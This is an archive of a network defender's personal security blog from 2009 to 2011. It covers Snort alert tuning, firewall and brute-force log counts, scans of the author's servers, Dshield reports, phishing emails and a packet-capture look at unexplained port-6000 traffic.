The 'S' Files

Snort and Thresholding Noisy Alerts

2011-08-04T12:16:00.000-04:00

I'm trying to stay sharp as a security techie, so I've been trying to contribute to Linux and security forums. There's a guy who was asking how to use bpf.conf with Snort. I suggested he use threshold.conf instead. I actually referenced this (I love TaoSecurity) to help him. He was being flooded with "SHELLCODE x86 inc ecx NOOP" alerts. The assistance thread is here, at LinuxQuestions.org.

Connection Tracking and IPTables

2011-05-04T14:32:00.001-04:00

Conntrack entries

I'm making a point of trying to read through this Iptables document. The connection tracking function is pretty cool, though. I was aware of the functionality but had never seen the logs at /proc/net/ip_conntrack until this morning.

BASE and Snorby: packet captures

2011-04-14T16:52:00.002-04:00

Noticed that someone on the interwebz stated that Snorby captures full payload while BASE doesn't. I read this as a comment on the Snorby pages. Unless I'm totally off-base here, that's not the case, unless they're taking about something like netflows or something akin to it. I believe one of the dev guys stated that only Snorby and Sguil offer full packet capturing. That does NOT sound right and I believe he should clarify.

I'll dig up the link later, but it should be very apparent on their pages (it was to me, when I was perusing).

So, I pulled up my BASE console and looked at a sample packet. To look at payload/packets within BASE, you go to a line item then click on the "ID", which would look akin to "2-278900".

BASE capture view:

Snorby capture view:

Now, I don't see either lacking in that regard. This is enough for the analyst to determine a false positive vs. a real attack/concern.

Now, if I wanted to further investigate, I can (in BASE), go to a listing, then click the offending IP (or the other IP...doesn't matter). Then I click "Unique alerts" or "Unique IP links" under "Summary Statistics":


Unique alerts

This is basic stuff here. It shows the history of that particular IP...it shows everything that was ever recorded from that IP, and you can dig down from there. Source/Destination would show bidirectional traffic between the offending IP and whatever it was communicating with. I'll get payload every time, IF (BIG IF HERE) the Snort signature is designed to capture payload and if the traffic even has payload.

I don't understand the argument of saying that BASE doesn't capture full payload. Of course, BASE won't. It's just a SEM. Snort would actually do the capturing. It would also totally depend on who sets up Snort and their requirements. The admin that configures Snort may not even have all the sigs enabled. But, BASE will show any payload that Snort does capture.

At this point, Snorby's search and analytical functionality is lacking. I've said this before and got ridiculed by one of the Snorby developers. We all know Snorby is relatively new when comparing it to BASE, but until the Snorby dev team enables better query functionality and better ways to quickly track activity, I'm going to stick to my guns. A pretty (and even simplified) interface is one thing, but when it comes to the meat and potatoes, candy apples doesn't cut it. As an analyst, I'd not want to lose any type of query features, as this will make a sometimes frustrating job all the more frustrating (been there, done that).

Lastly, I will NOT HAVE A PISSING MATCH over this. I've been doing such comparisons for YEARS and am fully capable of judging what is acceptable and what is not regarding most security tools (that's why I get paid the big bucks), although I'm always objective in my opinions. I definitely know what "best of breed" entails. I'm going to put it out there: Snorby is NOT best of breed. I'd love it to be, but right now, it is NOT. It has to help me sort/organize/filter information that helps me catch malware and such...much more that what it currently offers. Right now, with Snorby, there's no such thing as digging down or simplifying the search through thousands of potentially bad security events. "Packet capture options/Customer" isn't going to cut it. It is good for the small investigation but for the bigger tasks. Let's be grown-ups about this topic and offer objective opinions. If you can't do that, don't even try to leave some nasty comment on this blog. Comments moderation is enabled. Yes, I do require clarification on what is considered "full payload analysis", as I feel that's not enough of a description and could actually be relating to something else entirely different that the above (I doubt it, though).

GUIs for Snort

2011-03-21T13:46:00.001-04:00

GUIs for Snort --

http://blog.snort.org/2011/01/guis-for-snort.html

Some of these might appeal to you, the network/security administrator, depending on your organization's needs. Note: there is NO best in breed tool...it totally depends on your organization's needs, which will vary when comparing org X to org Y.

HTTP Viewers

2011-02-02T11:58:00.003-05:00

I found something that is very similar to Web-sniffer.net (an HTTP viewer/proxy)...it is called "Rex Swain's HTTP Viewer". That's a mouthful, so I'll call it RSHV.

One thing that Web-sniffer can't do is allow for referer configuration. RSHV will let you configure the referer (in fact, this appears to be a recently added feature). Why is this sometimes important? Read here. In comparison to Web-Sniffer.net, RSHV is better documented. A con of RSHV is that it won't do HTTPS.

Why do I call these HTTP viewers proxies? Well, they are. When you utilize those tools to view, for example, pages/headers at wigglit.ath.cx, if you check the web logs at wigglit.ath.cx, you'll see the traffic you generated came from someone else's IP (and not the one that was assigned to your machine when you visited wigglit.ath.cx). That's a protection, in my opinion...this means you can conduct research without having to use a lab system to prevent infection.

Note that the services these two tools provide can be done on pretty much any computer (*nix or win32/64). Just use telnet. Of course, wget can also be used (or fetch or curl), but I consider that to be a more cumbersome solution (although you may be able to create scripts that you can use wget/fetch/curl with).

Utilizing such tools in such a manner is important when conducting security analysis (for instance, validating that a certain website is or isn't compromised and serving malware).

58.221.32.117 hammering my server

2010-10-05T22:30:00.002-04:00

I've been seeing 58.221.32.117 in my logs, especially within the last week or so. So far, I've 5,356 instances of blocking by the firewall for this particular IP. All traffic is coming from source port 80 of that IP. Yes, every single instance was blocked.

Has anyone else seen similar activity from this IP?

A whois shows the following:


IP address [?]:	58.221.32.117 [Whois] [Reverse IP]
IP country code:	CN
IP address country:	China
IP address state:	Beijing
IP address city:	Beijing
IP address latitude:	39.9289
IP address longitude:	116.3883
ISP of this IP [?]:	CHINANET jiangsu province network
Organization:	CHINANET jiangsu province network
Local time in China:	2010-10-06 10:29

E-mail Malware Attempt

2010-08-26T15:54:00.001-04:00

I've a friend that I got an e-mail from. It had an empty subject line and one URL in the body. Twenty others were sent the same e-mail.

I notified the sender that they had an issue. I then decided to use Web-Sniffer to attempt to visit the link and do a quick investigation.

When visiting via the web proxy, I observed the following:

The web server was up and running, serving content but threw a code 302. It also may have attempted to redirect to hxxp://uvuhjomuph.com (I obfuscated the link). Clicking that URL takes me to an ED page (erectile dysfunction):

Googling that domain, I got at least one good hit:

So, my friend more than likely got phished and her e-mail account is now throwing out spam for penile meds. :(

Protect your privates!

2010-08-25T16:48:00.001-04:00

Protect your privates!

http://isc.sans.edu/diary.html?storyid=9367

In view of all the brute force attacks still being attempted against Secure Shell (SSH), we have long since been extolling the virtues of forgoing passwords and moving to RSA/DSA keys instead.
While key based login indeed nicely addresses the problem of password guessing attacks, it looks like many a Unix admin has been less than diligent in the implementation. In pretty much every Unix security audit recently, we've come across unprotected or badly protected SSH private keys (id_dsa, id_rsa). Some reside plain flat out in the open, in /tmp and such. Others are found in world-readable tar "backup" archives of user and administrator home directories. Some are even built into home-grown Linux RPM and Solaris PKG packages, ready to be plucked off an install server.

Failure of controls...Spanair crash caused by a Trojan

2010-08-25T15:45:00.002-04:00

Failure of controls...Spanair crash caused by a Trojan

Several readers have pointed us to an article about the preliminary report of the Spanair flight that crashed on takeoff in 2008 killing 154. The article suggests that a Trojan infected a Spanair computer and this prevented the detection of a number of technical issues with the airplane. The article speculates that if these issues had been detected the plane would not have been permitted to attempt take off.

NOTE: Another article is here. Another is here, and this one supports the error being on the pilots' behalves (bad pre-flight checks).

Splunk?

2010-08-24T12:08:00.001-04:00

Been thinking on trying Splunk, a console that can monitor multiple system logs, along with health and security alerts.

I'll post more as I delve into this intriguing tool.

SAGAN: An open-source event correlation system - Part 1: Installation (from isc.sans.org)

2010-07-19T14:55:00.001-04:00

SAGAN: An open-source event correlation system - Part 1: Installation

SAGAN can be found here.

Distributed SSH Brute Force Attempts on the rise again -- SANS ISC

2010-06-18T10:51:00.000-04:00

Reported by SANS ISC:

Distributed SSH Brute Force Attempts on the rise again

SSH brute force attempts seem to be on the rise again, at the SANS Internet Storm Center we have received a number of reports that a number of networks are seeing them. The source IP addresses vary with each new attempted username in the wordlist, which would indicate that the attempts are distributed through botnet(s). It only takes a single user with a weak password for a breach to occur, then with that foothold escalation and further attacks are likely next. This is certainly not a new phenomenon, however I think it is a good time to raise awareness about it once again.

Twitter Spam

2010-05-05T13:28:00.001-04:00

I looked in my e-mail going back a few days and saw the above e-mail. It looks legit, right? It appears to be coming from a twitter engineer, but look at my mouseover...there's a different URL behind the one showing and it looks to be suspicious.

I've gotten six of these since April 21st and I know that they're phishing-related. Most people don't know this, though. While some people suspect this type of e-mail is suspect, others are asking, "WTF is this?"

Tips:

1. Turn off HTML rendering in your e-mail client, as this prevents accidental clicking of malware/spyware/phishware links.

2. If you prefer HTML rendering to be on, if your OS or e-mail client supports link mouseover, you should be able to see what site you'd be directed to if you clicked the link. If the link isn't related to Twitter, then you know that something isn't right about that e-mail.

These phishers are beginning to get crafty, and in a subtle manner. It's sad that we have to suspect any official e-mails as bad as a first step.

Bottom Line: Don't click on those links if you're getting these types of e-mails.

Got Prey?

2010-04-11T18:01:00.002-04:00

I've installed Prey onto my Dell Mini 9. I'm considering also installing it onto my wife's Dell Mini 10 and both of our Macbooks.

Prey is a small and free application that will help you track down your machine if it is stolen. They've agents for Windows, Mac OS X, and Linux. It can be run on a desktop or laptop.

What you do is register with the website, install the application onto the machines you want to monitor (up to three per account). You then sync keys between the application and server software. You can monitor many things on the remote machine from the Prey website and can determine the general location of your equipment. You can even send messages to the thief!

This software gives you the chance to recover your equipment by enabling manipulation of the system. It can alert the 'new owner', it can be tracked via traceroute or GPS, the logs and processes can be monitored, and the webcam can be enabled.

Web Server Got Scanned

2010-03-30T22:52:00.004-04:00

So, I got alerted last night that source IP 74.53.76.11 was hitting my web server was scanned....heavily.

The FW blocked it...it all hit the clean-up rule, which is a bit weird. Usually, IPs that scan will hit open ports also (I've a few open). This one was one of those with a source port of 80 that isc.sans.org was reporting about a few weeks ago. The IP belongs to ThePlanet. TrustedSource shows some squirrely activity but nothing definitive. My IDS didn't pick up anything either. I also searched MyNetWatchman but the server is busted and craps out when I try to conduct searches. The scan started at 14:38 and ended at 17:45 EST.

I'll keep a watch out for further activity.

References:

http://www.trustedsource.org/query/74.53.76.11

http://www.dshield.org/ipinfo.html?ip=74.53.76.11

EDIT (4/1/2010):

74.53.76.11 scanned the server today, generating 2144 FW log entries that were blocks triggered by the clean-up rule.

http://www.trustedsource.org/query/74.53.76.11

http://www.dshield.org/ipdetails.html?ip=74.53.76.11

EDIT (4/2/2010):

124.217.254.63 also scanned the server today, generating 487 FW log entries that were blocks triggered by th clean-up rule.

http://www.trustedsource.org/query/124.217.254.63

http://www.dshield.org/ipinfo.html?ip=124.217.254.63

Kismet for Macs - WEP/WPA/WPA2

2010-03-29T00:12:00.000-04:00

Added KisMac to my Macbook.

This software is NICE!! I've used Kismet before (on a Sharp Zaurus SL5500), but the Mac version is VERY nice!

One disturbing thing (that I should put on my security blog) is that I saw a lot of WAPs in my neighborhood still using WEP. Three of them were Actiontec routers, which show the new rollout of FIOS from Verizon. Mine also shows up, but mine is set to use WPA2. There were maybe 5-6 WAPs using WPA (of maybe 10-12), but I was the ONLY one that I detected that was using WPA2. That's not good, IMO.

I may take a drive around tomorrow to sample the neighborhood. I'll parse that data and post it on my security blog.

Feds weigh expansion of Internet monitoring

2010-03-25T22:35:00.000-04:00

Feds weigh expansion of Internet monitoring

http://tinyurl.com/ybd23bz (credit: cnet.com)

SAN FRANCISCO--

"Homeland Security and the National Security Agency may be taking a closer look at Internet communications in the future.

The Department of Homeland Security's top cybersecurity official told CNET on Wednesday that the department may eventually extend its Einstein technology, which is designed to detect and prevent electronic attacks, to networks operated by the private sector. The technology was created for federal networks.

Not much is known about how Einstein works, and the House Intelligence Committee once charged that descriptions were overly "vague" because of "excessive classification." The White House did confirm this week that the latest version, called Einstein 3, involves attempting to thwart in-progress cyberattacks by sharing information with the National Security Agency.

Greater federal involvement in privately operated networks may spark privacy or surveillance concerns, not least because of the NSA's central involvement in the Bush administration's warrantless wiretapping scandal. Earlier reports have said that Einstein 3 has the ability to read the content of emails and other messages, and that AT&T has been asked to test the system. (The Obama administration says the "contents" of communications are not shared with the NSA.)"

Read more by clicking the link at the top of this section

I passed my Security+ certification Exam!

2010-03-03T22:52:00.002-05:00

I passed my Security+ exam! This certification is needed for a work client (a requirement to access their systems). This is a big deal to me, as I'd been studying awhile for it and the deadline for completion was next week.

I don't believe in certifications (I feel strongly that they aren't needed), but this is a first for me.

I'm so glad it is over! Now its reimbursement time! :)

Aggressive Scanner hitting wigglit.ath.cx

2010-02-25T23:38:00.003-05:00

A picture is worth a thousand words:

I blocked him/her last night. He/she hit again early this morning, but got rejected (not blocked). My sensor will log even if the attacks don't pass (picture it as an external IDS, although it really isn't). I sooo wish I messed with tarpits. I could rate-limit, though. I'll think about that.

UPDATE:

TrustedSource
myNetWatchman

Playing with the logs again

2010-02-14T01:52:00.004-05:00

So, I've some logging going on. I typically look at my auth logs and my FW logs that reside within /var/log. I also archive my bruteforce blocking FW table (PF), as the table dumps when I reboot or when the system loses power.

I consolidated these logs into one massive file (333,603 IPs). Yes, there are probably many repeat IPs, but that's OK. Several (26 of them, consisting of two unique IPs) are when I accidentally blocked myself.

I took the resulting file and did this:

cat top10_1.txt | sort | uniq -c | sort -rn

which resulted in this file.

The IPs with a count of '238' are obviously part of a distributed brute forcing botnet...its intriguing the way it is depicted within this hack's output. Also, the actual number of unique IPs recorded is 2377.

Now, maybe I should script something to provide me something like this on a daily basis...meaning, I'd like to see only that day's activity (right now, I'm crunching logs from at least a year back).

Also, this is from my FreeBSD machine, which runs PF, has port 22 open to the world (locked down service, though), has port 3306 open, and is my security box.

SANS Article -- Weathering the Storm Part 2

2010-01-30T12:16:00.004-05:00

Weathering the Storm Part 2 @ http://blogs.sans.org/appsecstreetfighter/2010/01/29/weathering-the-storm-part-2-a-day-of-weblogs-at-the-internet-storm-center/

This is pretty cool. This article describes how to parse web server logs for RFI (remote file inclusion). It actually pinpoints the URLs that contain the malicious code.

At first I had an issue in following the logic of the write-up, but when I looked at the scripting, I edited it slightly and used the following:

cat access_log | cut -f2 -d'"' access_log* | grep '=http' | grep -v 'utmr=http' | sed 's/.*=http/http/' | uniq -c | sort -rn > /root/WTSP2.txt

Yeah, I unzipped the .gz files so that I could have the script parse ALL of the access logs. The result is here.

For people who want to perform forensics on these URLs, have at it but note that some of the links may be old and may no longer exist (or may be blocked or purposely taken down).

Dshield Results From Log Donations

2010-01-17T16:52:00.002-05:00

So, every day I submit logs to Dshield, I get a report from them with a breakdown of the submitted logs.

Here's an example:




For 2010-01-15 you submitted 496 packets from 136 sources hitting 2 targets.

Port Summary
============

Port  |  Packets  |  Sources  |  Targets  |      Service       |  Name
------+-----------+-----------+-----------+--------------------+-------------
 445 |        63 |        17 |         2 |       microsoft-ds | Win2k+ Server Message Block
 5900 |        31 |        15 |         2 |                vnc | Virtual Network Computer
 135 |        46 |        14 |         2 |              epmap | DCE endpoint resolution
 1080 |       162 |        13 |         2 |              socks | Proxy Server
  22 |        19 |        12 |         2 |                ssh | SSH Remote Login Protocol
  23 |         9 |         9 |         2 |             telnet |
 1433 |        12 |         9 |         2 |           ms-sql-s | Microsoft-SQL-Server
 3389 |        11 |         7 |         2 |   ms-term-services | MS Terminal Services
 3072 |        12 |         6 |         1 |        csd-monitor | ContinuStor Monitor Port
 4899 |         7 |         5 |         2 |             radmin | Remote Administrator default port
  25 |        20 |         5 |         2 |               smtp | Simple Mail Transfer
 3128 |        13 |         5 |         2 |         squid-http | Proxy Server
 8000 |        10 |         5 |         2 |              irdmi | iRDMI
 8080 |         7 |         4 |         2 |           http-alt | HTTP Alternate (see port 80)
 139 |         7 |         3 |         2 |        netbios-ssn | NETBIOS Session Service
 7212 |         7 |         3 |         2 |                    |
  21 |         5 |         3 |         1 |                ftp | File Transfer [Control]
  80 |         6 |         2 |         1 |                www | World Wide Web HTTP
 2967 |         2 |         2 |         1 |          ssc-agent | Symantec System Center
 1024 |         6 |         2 |         1 |                    |


Port Scanners
=============

   source     | Ports Scanned | Host Name
---------------+---------------+------------
 173.192.192.92|          10   | 173.192.192.92-static.reverse.softlayer.com
 221.192.199.35|           6   |
 78.159.112.84|           5   |
 77.223.143.18|           4   | 77-223-143-18.netdirekt.com.tr
 222.215.230.49|           4   |
 205.209.161.68|           3   |
 67.51.137.218|           2   |
 173.66.248.120|           2   | auth03.cs.net
188.132.196.173|           2   | datacenter-173-196-132-188.sadecehosting.net
 68.237.174.120|           2   | static-68-237-174-120.lsanca.fios.verizon.net
206.217.205.170|           2   | noptr.midphase.com
 66.159.229.149|           2   | netblock-66-159-229-149.dslextreme.com
222.208.183.218|           2   |
  66.160.182.5|           2   | system-5.squaw.com
   64.38.82.20|           2   |
174.129.185.251|           2   | ec2-174-129-185-251.compute-1.amazonaws.com


Source Summary
==============

   source     | hostname  |packets|targets| all pkts | all trgs | first seen
---------------+-----------+-------+-------+----------+----------+-----------
  66.160.182.5|5.squaw.com|    54 |     1 |      143 |       66 | 01-08-2010
  79.125.50.62|azonaws.com|    33 |     1 |    14083 |       94 | 01-11-2010
 79.125.39.245|azonaws.com|    27 |     1 |     5974 |       92 | 01-11-2010
 174.129.93.137|azonaws.com|    27 |     1 |    16623 |      102 | 01-06-2010
174.129.161.206|azonaws.com|    21 |     1 |     8258 |       99 | 01-11-2010
174.129.137.234|azonaws.com|    15 |     1 |     2328 |       90 | 01-14-2010
 221.192.199.35|           |    13 |     1 |    63162 |     2825 | 01-05-2010
  79.125.44.37|azonaws.com|    12 |     1 |     6155 |       88 | 01-12-2010
 173.192.192.92|ftlayer.com|    10 |     1 |   287815 |    25717 | 12-31-2009
 222.215.230.49|           |     9 |     2 |   225112 |     6288 | 05-28-2008
 79.125.32.165|azonaws.com|     9 |     1 |     2346 |       89 | 01-14-2010
 94.59.233.125|           |     7 |     1 |       29 |       13 | 01-15-2010
 77.223.143.18|rekt.com.tr|     7 |     1 |   120123 |    20906 | 12-28-2009
 78.159.112.84|           |     6 |     1 |     7356 |     3206 | 01-15-2010
188.132.196.173|hosting.net|     6 |     1 |     2606 |     1735 | 01-13-2010
118.161.243.145|c.hinet.net|     6 |     1 |       54 |        8 | 01-15-2010
   64.38.82.20|           |     5 |     1 |      894 |      446 | 01-15-2010
 205.209.161.68|           |     5 |     1 |      278 |      245 | 01-15-2010
204.236.194.181|azonaws.com|     5 |     1 |     8563 |       95 | 01-10-2010
204.236.244.234|azonaws.com|     4 |     1 |    10215 |      155 | 01-05-2010

All of this is valuable, and I can sometimes tune the IDS and FW based on the findings of these reports. There are other freeware tools that can do this type of data crunching, but I like the fact that if I'm donating logs, I'm getting a analysis report in return.

Now, the concern is that there's a lot of source IPs that appear to be owned by Amazon (Amazon Web Services). I'm hoping that most of these aren't EC2 hosts. If so, that indicates that Amazon has a security or abuse issue (or a combination of both). I'm hesitant to mention this to ISC since this may well be a trivial concern for them. Regardless of perception, I still believe this is more than likely an issue that should be pursued.

Dshield; Verizon FiOS

2010-01-14T13:02:00.003-05:00

I've finally got this running.

I spent a bit of time with it last night and found that the dshield.cnf file had some errors.

I still need to tune it, though, because the script is reporting non-malicious web traffic to Dshield...I'll need to exclude all non-attacks and non-probes.

On another note, I'm at home today since we're getting FiOS installed. This service will replace Direct TV and Comcast. I'm looking forward to a dedicated internet connection. I'll be getting the 25/15 (down/up) internet pipe (YES) and two DVRs (I hope to replace the circa-2003 Tivo soon, with something better).

What's Up With All The Port Scanning Using TCP/6000 As A Source Port?

2010-01-11T22:33:00.005-05:00

What's Up With All The Port Scanning Using TCP/6000 As A Source Port?

Yeah, this is from ISC. I've been noticing this for awhile, but I thought it was just noise. Apparently, others noticed it too. Here's what I have (example snippet):

syslog:Jan 10 14:16:03 none kernel: BLOCKED: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f
c:8b:69:08:00 SRC=221.194.45.3 DST=66.160.141.30 LEN=40 TOS=0x00 PREC=0x00 TTL=109 ID=256
PROTO=TCP SPT=6000 DPT=1521 WINDOW=16384 RES=0x00 SYN URGP=0
syslog:Jan 10 15:44:17 none kernel: BLOCKED: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f
c:8b:69:08:00 SRC=218.240.32.166 DST=66.160.141.30 LEN=40 TOS=0x00 PREC=0x00 TTL=110 ID=25
6 PROTO=TCP SPT=6000 DPT=2967 WINDOW=16384 RES=0x00 SYN URGP=0
syslog:Jan 10 16:21:55 none kernel: BLOCKED: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f
c:8b:69:08:00 SRC=61.182.168.30 DST=64.62.231.220 LEN=40 TOS=0x00 PREC=0x00 TTL=107 ID=256

Yeah, I've been blocking these. It's pretty easy, as I've a firewall policy that just flat-out blocks anything I don't outright allow...It's pretty hardcore. For those who think that "port 80 will always be open" (yeah, I do run a web-server), Modsecurity covers that port...but I'm deviating from the topic of this post.

No one seems to know what the offending IPs are doing, but most appear to originate from China. I'm running a tcpdump to try to gather data, but so far I don't have much (6 hours of sniffing only shows 4 hits so far).

I'm using the following tcpdump command:

tcpdump -i eth0 -Xvvnne -s 0 src port 6000 -w /tmp/dump_src_port_6000

I'll leave it running for 24 hours then check and see what I have...it might not amount to much, though.

UPDATE:

One thing I noticed right off the bat was the destination ports...they are all affiliated with MS Windows services (ports 135, 139, 1433, 2967, 1521) but also ports such as 8000, 8080 and 7212. Weird. I'll keep the sniff going for a few days (a week's worth of sniffing, maybe).

UPDATE #2:

Decided to kill the tcpdump process to see what's going on and post it here. Will start it up again before I head to bed (I doubt I'm missing much so far):

root@starchild:~# tcpdump -Xvvnes -0 -r /tmp/dump_src_port_6000
reading from file /tmp/dump_src_port_6000, link-type EN10MB (Ethernet)
20:06:55.553601 00:0c:db:fc:8b:69 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 54: (tos 0x0, ttl 107, id 256, offset 0, flags [none], proto TCP (6), length 40) 221.195.73.68.6000 > 66.160.141.30.8000: S, cksum 0x3a87 (correct), 132448256:132448256(0) win 16384
0x0000: 4500 0028 0100 0000 6b06 580a ddc3 4944 E..(....k.X...ID
0x0010: 42a0 8d1e 1770 1f40 07e5 0000 0000 0000 B....p.@........
0x0020: 5002 4000 3a87 0000 P.@.:...
21:06:16.773790 00:0c:db:fc:8b:69 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 54: (tos 0x0, ttl 109, id 256, offset 0, flags [none], proto TCP (6), length 40) 121.101.212.38.6000 > 66.160.141.30.1433: S, cksum 0xca79 (correct), 1796538368:1796538368(0) win 16384
0x0000: 4500 0028 0100 0000 6d06 2f86 7965 d426 E..(....m./.ye.&
0x0010: 42a0 8d1e 1770 0599 6b15 0000 0000 0000 B....p..k.......
0x0020: 5002 4000 ca79 0000 P.@..y..
21:36:31.664717 00:0c:db:fc:8b:69 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 54: (tos 0x0, ttl 110, id 256, offset 0, flags [none], proto TCP (6), length 40) 60.13.26.66.6000 > 64.62.231.220.1433: S, cksum 0xd34d (correct), 19005440:19005440(0) win 16384
0x0000: 4500 0028 0100 0000 6e06 cd66 3c0d 1a42 E..(....n..f<..B
0x0010: 403e e7dc 1770 0599 0122 0000 0000 0000 @>...p..."......
0x0020: 5002 4000 d34d 0000 P.@..M..
22:00:21.259640 00:0c:db:fc:8b:69 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 54: (tos 0x0, ttl 106, id 256, offset 0, flags [none], proto TCP (6), length 40) 222.45.112.219.6000 > 66.160.141.30.135: S, cksum 0xe3c1 (correct), 1432485888:1432485888(0) win 16384
0x0000: 4500 0028 0100 0000 6a06 3109 de2d 70db E..(....j.1..-p.
0x0010: 42a0 8d1e 1770 0087 5562 0000 0000 0000 B....p..Ub......
0x0020: 5002 4000 e3c1 0000 P.@.....

I'm not seeing much but my FW is definitely not helping things, either (killing the connections, which is why you can only see syn packets). Well, anyone else want to guess what's going on?

Been awhile...

2010-01-09T15:40:00.002-05:00

So, what am I doing currently?

I've been having an issue getting a print server (Linksys PSUS4) to work with anything other than Windows.

I've two Macs in the house that do NOT like this print server. I've yet to test it in Linux but my wife is one of the people that uses the Macs heavily, so the Linux alternative won't work for her.

For now, I'm attempting to utilize my main Linux machine, 'slackbox' as a print server by using CUPS. The version of Slackware that this machine is using is v12.0. I've found that there is HPLIP support for Slackware v12.0 but I'll need to update the HPLIP version (it is currently at v1.7.4). So, I've the option of attempting to patch the current install to the latest version (no, I've not been keeping up with patches), or compile the latest version from sources and install it to the Slackware machine.

Another thing I've found is that http://packages.slackware.it/ has been down since at least this past October. I didn't realise how crucial this Slackware service was, but I'm hoping that this gets fixed soon or that Pat V. eventually addresses the issue by standing up his own service. As much as I agree with the manual approach to Linux, there will come a time to where some things may have to become simplified...this is one of those things, I think.

Anyways, I'll update this post with any notes as I continue to work around the print server issue (so that my wife can quit nagging me and making bad assumptions about things she doesn't understand).

Emergingthreats.com sigs...

2009-11-15T22:54:00.001-05:00

Quick note:

One thing I hate about emergingthreats.com sigs is the fact that the sigs have no real documentation. Yeah, I know there's a site (a few, in fact) that provide this (via opensource efforts), but I much prefer to not have to research each and every sig all the time I'm investigating something.

FW Log Check

2009-08-17T08:22:00.006-04:00

Doing a remote check of FW activity, I've found that the FW has blocked MANY IPs in the last 9 days:

[root@delly ~]# zcat /var/log/bruteforce.0908* | wc -l
11424

Those are all unique IPs. Out of curiosity, I checked July's and May's logs:

[root@delly ~]# zcat /var/log/bruteforce.0907* | wc -l
40511

[root@delly ~]# zcat /var/log/bruteforce.0906* | wc -l
10121

All I can say is, "WOW!!" There was a HUGE spike in July (maybe due to summer vacation of most kids). Unfortunately, my logs don't go back beyond June.

I'm curious as to how August will be but I can already see that the number will be high. I'll update the blog as I as continue to watch.

[EDIT: I checked August's count and it is below:

zcat /var/log/bruteforce.0908* | wc -l
40761

September (so far) is:

zcat /var/log/bruteforce.0909* | wc -l
20186

I think I'll start scripting this command to run every week so that I can start trending.[09/15/2009]]

[Edit:

So, it is 7/19/2011. I will try to graph what I'm about to provide, but here's what I have after zcatting some .gz files:

2011:

[root@delly ~]# zcat /var/log/bruteforce.1107* | wc -l

58589

[root@delly ~]# zcat /var/log/bruteforce.1106* | wc -l

91736

[root@delly ~]# zcat /var/log/bruteforce.1105* | wc -l

93765

[root@delly ~]# zcat /var/log/bruteforce.1104* | wc -l

89521

[root@delly ~]# zcat /var/log/bruteforce.1103* | wc -l

91337

[root@delly ~]# zcat /var/log/bruteforce.1102* | wc -l

81415

[root@delly ~]# zcat /var/log/bruteforce.1101* | wc -l

89971

2010:

[root@delly ~]# zcat /var/log/bruteforce.1012* | wc -l

90024

[root@delly ~]# zcat /var/log/bruteforce.1011* | wc -l

87120

[root@delly ~]# zcat /var/log/bruteforce.1010* | wc -l

89748

[root@delly ~]# zcat /var/log/bruteforce.1009* | wc -l

85585

[root@delly ~]# zcat /var/log/bruteforce.1008* | wc -l

84738

[root@delly ~]# zcat /var/log/bruteforce.1007* | wc -l

66438

[root@delly ~]# zcat /var/log/bruteforce.1006* | wc -l

62905

[root@delly ~]# zcat /var/log/bruteforce.1005* | wc -l

63421

[root@delly ~]# zcat /var/log/bruteforce.1004* | wc -l

60478

[root@delly ~]# zcat /var/log/bruteforce.1003* | wc -l

59006

[root@delly ~]# zcat /var/log/bruteforce.1002* | wc -l

44380

[root@delly ~]# zcat /var/log/bruteforce.1001* | wc -l

45392

2009:

[root@delly ~]# zcat /var/log/bruteforce.0912* | wc -l

48281

[root@delly ~]# zcat /var/log/bruteforce.0911* | wc -l

45127

[root@delly ~]# zcat /var/log/bruteforce.0910* | wc -l

44254

[root@delly ~]# zcat /var/log/bruteforce.0909* | wc -l

40185

[root@delly /var/log]# zcat bruteforce.* |wc -l

1704809

[root@delly /var/log]# zcat bruteforce.* |wc -l | uniq

1704809

]

Strange traffic in Snort logs

2009-08-16T02:05:00.004-04:00

Yesterday, I was messing around with an older machine which had an older version (and rules) of Snort.

I let it run overnight, sniffing internal network traffic. Today, I checked the logs and saw the following:

root@slackbox:/var/log/snort# cat alert | grep 204.176.49.2
10.150.1.133:32834 -> 204.176.49.2:80 TCP TTL:63 TOS:0x0 ID:40635 IpLen:20 DgmLen:576 DF
10.150.1.133:32882 -> 204.176.49.2:80 TCP TTL:63 TOS:0x0 ID:22086 IpLen:20 DgmLen:576 DF

The whole trace is here, since Blogger tends to choke on Hex payload

So, I've a few questions:

1. Who is 10.150.1.133?

2. Who is 204.176.49.2 and 204.176.49.9?

3. So, I have a Tivo system in the house (the payload confirms this). Why is my Tivo calling out to an IP address that is owned by Verizon Business?

4. Why is my production internal Snort sensor not picking up this traffic but this test internal sensor is?

I've some answers to those questions:

1. 10.150.1.133 is a WRT54GX4 Linksys router. This was somewhat difficult for me to find out, because my main router doesn't normal chat to this particular router (it is isolated). The WRT54GX4's sole purpose is to provide internet connectivity for my Tivo. The Tivo is using a an old USB wifi connection that only has WEP support, so I use the WRT54GX4 to provide connectivity for the Tivo, lessening the risk in using WEP by isolating the WAP from the rest of the network. In order for me to find out what IP the Tivo is using, I'd have to sniff the traffic on the WRT54GX4's network, which I don't normally do. What I did instead was ping the IP, then check the arp table of the machine I pinged from. This told me the hostname and MAC address of the IP. Once I saw the hostname, I knew it had to be the Tivo generating this traffic (the payload above also helped).

2. I did a 'whois' search on IPs 204.176.49.2 and 204.176.49.9. Both show as belonging to Verizon Business. What threw me for a loop was that I was expecting it to show as owned by Tivo. After thinking on this a bit, it is more than likely that Verizon Business is providing IP space to Tivo (and maybe other hosting services). That is news to me, since I actually work for Verizon Business and am heavily involved in networking services.

3. I conducted Google searches on the IPs and came up with tons of hits. Some hits documented people who saw traffic outbound from their network to those IPs and they were concerned, but most of the hits show that the outbound connections are part of the Tivo service.

4. It is obvious that I have to compare the two internal Snort sensor's config files, specifically the http_inspect settings. Both internal sensors are on the same subnet (the Tivo is not...the WRT router is behind my main router and uses different IP space...the Tivo is behind this router), so both should've seen it. This leads me to believe that I've been missing some internal traffic, so I'll look into this issue soon.

I just wanted to post this so that when/if everyone that owns a Tivo sees such traffic, they won't get alarmed (I didn't see a specific page that stated that this was normal traffic).

Linode uptime

2009-08-06T18:14:00.000-04:00

ron@starchild:~$ w
18:09:25 up 417 days, 5:21, 2 users, load average: 0.01, 0.01, 0.00

Last year, I had the around the same, per linuxcounter.org's stats:

